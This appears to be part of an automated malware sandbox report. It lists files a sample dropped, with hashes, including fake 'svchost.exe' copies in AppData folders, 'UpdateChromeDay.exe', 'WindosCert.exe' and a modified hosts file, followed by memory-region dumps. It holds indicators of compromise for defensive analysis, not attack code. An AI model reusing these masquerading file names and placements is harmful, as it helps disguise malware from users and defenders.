                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe

                                                              Filesize

                                                              256KB

                                                              MD5

                                                              c1bec073b2d31b556844f1262599ec85

                                                              SHA1

                                                              f80b9f3fe02985fd8c75c3c035b914bcffce856c

                                                              SHA256

                                                              5d676e15188a787df2ea89ae5a541882a82353e54561149bf61a9783044657df

                                                              SHA512

                                                              c2bc51169ad908bb5cc318afabc00ba2c9b443ca3ebd841fee06e60bf197a982b6e542e98025a8f2da7267f8519642ec4bbb9ab278591f60e5b4b50ebdea694b

                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe

                                                              Filesize

                                                              256KB

                                                              MD5

                                                              c1bec073b2d31b556844f1262599ec85

                                                              SHA1

                                                              f80b9f3fe02985fd8c75c3c035b914bcffce856c

                                                              SHA256

                                                              5d676e15188a787df2ea89ae5a541882a82353e54561149bf61a9783044657df

                                                              SHA512

                                                              c2bc51169ad908bb5cc318afabc00ba2c9b443ca3ebd841fee06e60bf197a982b6e542e98025a8f2da7267f8519642ec4bbb9ab278591f60e5b4b50ebdea694b

                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe

                                                              Filesize

                                                              256KB

                                                              MD5

                                                              c1bec073b2d31b556844f1262599ec85

                                                              SHA1

                                                              f80b9f3fe02985fd8c75c3c035b914bcffce856c

                                                              SHA256

                                                              5d676e15188a787df2ea89ae5a541882a82353e54561149bf61a9783044657df

                                                              SHA512

                                                              c2bc51169ad908bb5cc318afabc00ba2c9b443ca3ebd841fee06e60bf197a982b6e542e98025a8f2da7267f8519642ec4bbb9ab278591f60e5b4b50ebdea694b

                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe

                                                              Filesize

                                                              321KB

                                                              MD5

                                                              6b02b44666eb8e6c83834fb346fe8668

                                                              SHA1

                                                              b787a7c2735b114765c30d0e837683da60569da7

                                                              SHA256

                                                              83120c98dd6e47442d1867df29e6edf968e7752e5809b7d4ec1d09c0069530e2

                                                              SHA512

                                                              e7c4054615cb0ddfef2141b55ef7167e4de5807786d66b092ebe4806d4ac04f83746bb9d93f3e556e3655d44edf6b0ac6b311c87f7fc0c7a5ce33af5b139b82d

                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe

                                                              Filesize

                                                              321KB

                                                              MD5

                                                              6b02b44666eb8e6c83834fb346fe8668

                                                              SHA1

                                                              b787a7c2735b114765c30d0e837683da60569da7

                                                              SHA256

                                                              83120c98dd6e47442d1867df29e6edf968e7752e5809b7d4ec1d09c0069530e2

                                                              SHA512

                                                              e7c4054615cb0ddfef2141b55ef7167e4de5807786d66b092ebe4806d4ac04f83746bb9d93f3e556e3655d44edf6b0ac6b311c87f7fc0c7a5ce33af5b139b82d

                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe

                                                              Filesize

                                                              321KB

                                                              MD5

                                                              6b02b44666eb8e6c83834fb346fe8668

                                                              SHA1

                                                              b787a7c2735b114765c30d0e837683da60569da7

                                                              SHA256

                                                              83120c98dd6e47442d1867df29e6edf968e7752e5809b7d4ec1d09c0069530e2

                                                              SHA512

                                                              e7c4054615cb0ddfef2141b55ef7167e4de5807786d66b092ebe4806d4ac04f83746bb9d93f3e556e3655d44edf6b0ac6b311c87f7fc0c7a5ce33af5b139b82d

                                                            • C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe

                                                              Filesize

                                                              111KB

                                                              MD5

                                                              dab5342d0d566bc7d80e1cc11459912e

                                                              SHA1

                                                              7cd1a45da9458278571b13f08b28f607093e1225

                                                              SHA256

                                                              fa6ed407a949b1da6c2123ef67ef53280c4bb02bde373c62cad3ae228b5a4dd1

                                                              SHA512

                                                              0ccb2bc126d3a9e4af8cc022d93db95a9b542beb488bc23f55ade60cf7a5437657a9a0095cb4b8f56408fb75eddcb8d80a1c7ba2e658a889c57762d8d3f77d72

                                                            • C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe

                                                              Filesize

                                                              111KB

                                                              MD5

                                                              dab5342d0d566bc7d80e1cc11459912e

                                                              SHA1

                                                              7cd1a45da9458278571b13f08b28f607093e1225

                                                              SHA256

                                                              fa6ed407a949b1da6c2123ef67ef53280c4bb02bde373c62cad3ae228b5a4dd1

                                                              SHA512

                                                              0ccb2bc126d3a9e4af8cc022d93db95a9b542beb488bc23f55ade60cf7a5437657a9a0095cb4b8f56408fb75eddcb8d80a1c7ba2e658a889c57762d8d3f77d72

                                                            • C:\Users\Admin\AppData\Roaming\WindosCert.exe

                                                              Filesize

                                                              95KB

                                                              MD5

                                                              af8a3a1cb685f9e1fdcc970bd4ca420f

                                                              SHA1

                                                              9342d6f660df293516c2932c905fe4411474e321

                                                              SHA256

                                                              39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

                                                              SHA512

                                                              04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

                                                            • C:\Users\Admin\AppData\Roaming\WindosCert.exe

                                                              Filesize

                                                              95KB

                                                              MD5

                                                              af8a3a1cb685f9e1fdcc970bd4ca420f

                                                              SHA1

                                                              9342d6f660df293516c2932c905fe4411474e321

                                                              SHA256

                                                              39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

                                                              SHA512

                                                              04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

                                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                              Filesize

                                                              2KB

                                                              MD5

                                                              6cf293cb4d80be23433eecf74ddb5503

                                                              SHA1

                                                              24fe4752df102c2ef492954d6b046cb5512ad408

                                                              SHA256

                                                              b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                              SHA512

                                                              0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              2238871af228384f4b8cdc65117ba9f1

                                                              SHA1

                                                              2a200725f1f32e5a12546aa7fd7a8c5906757bd1

                                                              SHA256

                                                              daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882

                                                              SHA512

                                                              1833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf

                                                            • C:\Windows\system32\drivers\etc\hosts

                                                              Filesize

                                                              2KB

                                                              MD5

                                                              c5227366b7a688ff23b01788718251aa

                                                              SHA1

                                                              9795262e79c832ba49c744fcd1b1794c0ffb5c6a

                                                              SHA256

                                                              789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48

                                                              SHA512

                                                              8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe

                                                            • memory/100-271-0x0000000140000000-0x000000014085E000-memory.dmp

                                                              Filesize

                                                              8.4MB

                                                            • memory/100-167-0x0000000140000000-0x000000014085E000-memory.dmp

                                                              Filesize

                                                              8.4MB

                                                            • memory/100-218-0x0000000140000000-0x000000014085E000-memory.dmp

                                                              Filesize

                                                              8.4MB

                                                            • memory/540-146-0x0000000000C00000-0x0000000000C22000-memory.dmp

                                                              Filesize

                                                              136KB

                                                            • memory/2556-133-0x0000000000400000-0x0000000003579000-memory.dmp

                                                              Filesize

                                                              49.5MB

                                                            • memory/2556-184-0x0000000000400000-0x0000000003579000-memory.dmp

                                                              Filesize

                                                              49.5MB

                                                            • memory/2556-132-0x0000000000400000-0x0000000003579000-memory.dmp

                                                              Filesize

                                                              49.5MB

                                                            • memory/2572-200-0x0000000006300000-0x000000000631E000-memory.dmp

                                                              Filesize

                                                              120KB

                                                            • memory/2572-147-0x0000000002DB0000-0x0000000002DE6000-memory.dmp

                                                              Filesize

                                                              216KB

                                                            • memory/2572-174-0x00000000054D0000-0x00000000054F2000-memory.dmp

                                                              Filesize

                                                              136KB

                                                            • memory/2572-258-0x0000000007920000-0x0000000007928000-memory.dmp

                                                              Filesize

                                                              32KB

                                                            • memory/2572-224-0x0000000007710000-0x000000000771A000-memory.dmp

                                                              Filesize

                                                              40KB

                                                            • memory/2572-231-0x0000000007930000-0x00000000079C6000-memory.dmp

                                                              Filesize

                                                              600KB

                                                            • memory/2572-250-0x00000000078E0000-0x00000000078EE000-memory.dmp

                                                              Filesize

                                                              56KB

                                                            • memory/2572-222-0x00000000076A0000-0x00000000076BA000-memory.dmp

                                                              Filesize

                                                              104KB

                                                            • memory/2572-221-0x0000000007CE0000-0x000000000835A000-memory.dmp

                                                              Filesize

                                                              6.5MB

                                                            • memory/2572-257-0x00000000079D0000-0x00000000079EA000-memory.dmp

                                                              Filesize

                                                              104KB

                                                            • memory/2572-220-0x00000000068E0000-0x00000000068FE000-memory.dmp

                                                              Filesize

                                                              120KB

                                                            • memory/2572-219-0x00000000740B0000-0x00000000740FC000-memory.dmp

                                                              Filesize

                                                              304KB

                                                            • memory/2572-181-0x0000000005D10000-0x0000000005D76000-memory.dmp

                                                              Filesize

                                                              408KB

                                                            • memory/2572-152-0x0000000005570000-0x0000000005B98000-memory.dmp

                                                              Filesize

                                                              6.2MB

                                                            • memory/2572-217-0x0000000006920000-0x0000000006952000-memory.dmp

                                                              Filesize

                                                              200KB

                                                            • memory/2572-182-0x0000000005E80000-0x0000000005EE6000-memory.dmp

                                                              Filesize

                                                              408KB

                                                            • memory/4168-151-0x0000000000C10000-0x0000000000C2E000-memory.dmp

                                                              Filesize

                                                              120KB

                                                            • memory/4168-156-0x00000000054A0000-0x000000000553C000-memory.dmp

                                                              Filesize

                                                              624KB

                                                            • memory/4976-172-0x00007FFDF4220000-0x00007FFDF4CE1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/4976-216-0x00007FFDF4220000-0x00007FFDF4CE1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/4976-316-0x00007FFDF4220000-0x00007FFDF4CE1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/4976-157-0x0000000000BE0000-0x0000000000FFE000-memory.dmp

                                                              Filesize

                                                              4.1MB

                                                            • memory/14152-249-0x0000000000510000-0x000000000056D000-memory.dmp

                                                              Filesize

                                                              372KB

                                                            • memory/18688-183-0x00007FFDEC680000-0x00007FFDED0B6000-memory.dmp

                                                              Filesize

                                                              10.2MB

                                                            • memory/22480-233-0x00007FFDF4220000-0x00007FFDF4CE1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/22480-197-0x000002954B870000-0x000002954B892000-memory.dmp

                                                              Filesize

                                                              136KB

                                                            • memory/22480-259-0x00007FFDF4220000-0x00007FFDF4CE1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/22480-189-0x00007FFDF4220000-0x00007FFDF4CE1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/107740-188-0x00007FFDEC680000-0x00007FFDED0B6000-memory.dmp

                                                              Filesize

                                                              10.2MB

                                                            • memory/116408-252-0x0000000000400000-0x0000000000420000-memory.dmp

                                                              Filesize

                                                              128KB

                                                            • memory/116408-281-0x0000000007260000-0x0000000007422000-memory.dmp

                                                              Filesize

                                                              1.8MB

                                                            • memory/116408-282-0x0000000007960000-0x0000000007E8C000-memory.dmp

                                                              Filesize

                                                              5.2MB

                                                            • memory/135120-192-0x00007FFDEC680000-0x00007FFDED0B6000-memory.dmp

                                                              Filesize

                                                              10.2MB

                                                            • memory/161724-202-0x00007FFDF4220000-0x00007FFDF4CE1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/161724-215-0x00007FFDF4220000-0x00007FFDF4CE1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/161724-198-0x000001684BD40000-0x000001684C3DC000-memory.dmp

                                                              Filesize

                                                              6.6MB

                                                            • memory/199320-280-0x0000000007E30000-0x0000000007E80000-memory.dmp

                                                              Filesize

                                                              320KB

                                                            • memory/199320-238-0x0000000000390000-0x00000000003B0000-memory.dmp

                                                              Filesize

                                                              128KB

                                                            • memory/213364-211-0x00007FFDEF8E0000-0x00007FFDF0316000-memory.dmp

                                                              Filesize

                                                              10.2MB

                                                            • memory/244212-214-0x00007FFDEF8E0000-0x00007FFDF0316000-memory.dmp

                                                              Filesize

                                                              10.2MB

                                                            • memory/287380-244-0x0000000000370000-0x0000000000390000-memory.dmp

                                                              Filesize

                                                              128KB

                                                            • memory/399728-261-0x0000000000400000-0x000000000041C000-memory.dmp

                                                              Filesize

                                                              112KB

                                                            • memory/399940-279-0x0000000140000000-0x000000014085E000-memory.dmp

                                                              Filesize

                                                              8.4MB

                                                            • memory/399940-284-0x0000000140000000-0x000000014085E000-memory.dmp

                                                              Filesize

                                                              8.4MB

                                                            • memory/399940-274-0x0000000140000000-0x000000014085E000-memory.dmp

                                                              Filesize

                                                              8.4MB

                                                            • memory/405724-306-0x00007FFDF4220000-0x00007FFDF4CE1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/405724-314-0x00007FFDF4220000-0x00007FFDF4CE1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/406252-323-0x00007FFDF4220000-0x00007FFDF4CE1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/406676-327-0x00007FFDF4220000-0x00007FFDF4CE1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/406676-345-0x000000001CDF0000-0x000000001CE02000-memory.dmp

                                                              Filesize

                                                              72KB

                                                            • memory/406676-338-0x00007FFDF4220000-0x00007FFDF4CE1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/406744-330-0x000002159CAE0000-0x000002159CAEA000-memory.dmp

                                                              Filesize

                                                              40KB

                                                            • memory/406744-332-0x000002159CAF0000-0x000002159CAFA000-memory.dmp

                                                              Filesize

                                                              40KB

                                                            • memory/406744-337-0x00007FFDF4220000-0x00007FFDF4CE1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/406744-329-0x000002159CD00000-0x000002159CD1C000-memory.dmp

                                                              Filesize

                                                              112KB

                                                            • memory/406744-326-0x00007FFDF4220000-0x00007FFDF4CE1000-memory.dmp

                                                              Filesize

                                                              10.8MB

                                                            • memory/406744-331-0x000002159CF40000-0x000002159CF5C000-memory.dmp

                                                              Filesize

                                                              112KB

                                                            • memory/406744-336-0x000002159CF80000-0x000002159CF8A000-memory.dmp

                                                              Filesize

                                                              40KB

                                                            • memory/406744-333-0x000002159CF60000-0x000002159CF7A000-memory.dmp

                                                              Filesize

                                                              104KB

                                                            • memory/406744-334-0x000002159CF20000-0x000002159CF28000-memory.dmp

                                                              Filesize

                                                              32KB

                                                            • memory/406744-335-0x000002159CF30000-0x000002159CF36000-memory.dmp

                                                              Filesize

                                                              24KB

                                                            • memory/407316-347-0x0000000140000000-0x0000000140809000-memory.dmp

                                                              Filesize

                                                              8.0MB

                                                            • memory/407316-346-0x0000000140000000-0x0000000140809000-memory.dmp

                                                              Filesize

                                                              8.0MB

                                                            • memory/407316-350-0x0000000140000000-0x0000000140809000-memory.dmp

                                                              Filesize

                                                              8.0MB

                                                            • memory/407316-351-0x0000000001680000-0x00000000016A0000-memory.dmp

                                                              Filesize

                                                              128KB

                                                            • memory/437032-278-0x0000000005920000-0x000000000593E000-memory.dmp

                                                              Filesize

                                                              120KB

                                                            • memory/437032-272-0x0000000007E80000-0x0000000008424000-memory.dmp

                                                              Filesize

                                                              5.6MB

                                                            • memory/437032-275-0x0000000005840000-0x00000000058B6000-memory.dmp

                                                              Filesize

                                                              472KB

                                                            • memory/437032-236-0x0000000007530000-0x000000000756C000-memory.dmp

                                                              Filesize

                                                              240KB

                                                            • memory/437032-235-0x0000000007580000-0x000000000768A000-memory.dmp

                                                              Filesize

                                                              1.0MB

                                                            • memory/437032-226-0x0000000000400000-0x0000000000420000-memory.dmp

                                                              Filesize

                                                              128KB

                                                            • memory/437032-232-0x0000000005B00000-0x0000000006118000-memory.dmp

                                                              Filesize

                                                              6.1MB

                                                            • memory/437032-234-0x0000000005A70000-0x0000000005A82000-memory.dmp

                                                              Filesize

                                                              72KB

                                                            • memory/437032-273-0x00000000057A0000-0x0000000005832000-memory.dmp

                                                              Filesize

                                                              584KB